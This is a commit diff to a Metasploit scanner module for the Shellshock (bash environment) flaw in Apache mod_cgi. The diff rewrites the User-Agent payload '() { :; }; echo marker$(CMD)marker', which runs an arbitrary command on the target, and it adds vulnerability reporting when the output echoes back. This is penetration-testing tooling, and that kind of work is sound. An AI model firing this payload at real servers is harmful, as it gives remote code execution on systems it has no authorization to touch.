Report vuln for apache_mod_cgi_bash_env

Now with fewer false positives! It's kinda like a check method.

Author: wvu

modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb

@@ -41,14 +41,22 @@ def initialize(info = {})
   end
 
   def run_host(ip)
+    marker = Rex::Text.rand_text_alphanumeric(rand(42) + 1)
+
     res = send_request_raw(
       'method' => datastore['METHOD'],
       'uri' => normalize_uri(target_uri.path),
-      'agent' => "() { :;}; #{datastore['CMD']}"
+      'agent' => %Q{() { :; }; echo "#{marker}$(#{datastore['CMD']})#{marker}"}
     )
 
-    if res && res.code == 200
-      vprint_good("#{peer} - #{res.body}")
+    if res && res.body =~ /#{marker}(.+)#{marker}/m
+      print_good("#{peer} - #{$1}")
+      report_vuln(
+        :host => ip,
+        :port => rport,
+        :name => self.name,
+        :refs => self.references
+      )
     end
   end